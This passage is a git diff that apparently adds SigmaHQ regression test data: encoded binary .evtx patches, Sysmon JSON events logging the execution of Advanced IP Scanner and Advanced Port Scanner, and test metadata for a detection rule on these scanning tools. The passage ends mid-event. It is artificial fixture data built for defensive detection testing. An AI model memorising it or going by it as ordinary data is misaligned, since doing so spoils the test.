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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json new file mode 100644 index 000000000..508e249e2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:01:48.031627Z" + } + }, + "EventRecordID": 650317, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:01:48.012", + "ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02", + "ProcessId": 2064, + "Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe", + "FileVersion": "2.5.4594.1", + "Description": "Advanced IP Scanner", + "Product": "Advanced IP Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_ip_scanner.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"", + "CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0", + "ParentProcessGuid": "14207D89-FCFD-68F9-D010-000000003F02", + "ParentProcessId": 3240, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..bdf211996 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + title: PUA - Advanced IP Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..105b6ce24dde429c97602270716133aa52cb14eb GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json new file mode 100644 index 000000000..50406a429 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:11:05.435406Z" + } + }, + "EventRecordID": 650602, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:11:05.414", + "ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02", + "ProcessId": 7316, + "Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe", + "FileVersion": "-", + "Description": "Advanced Port Scanner", + "Product": "Advanced Port Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_port_scanner.exe", + "CommandLine": 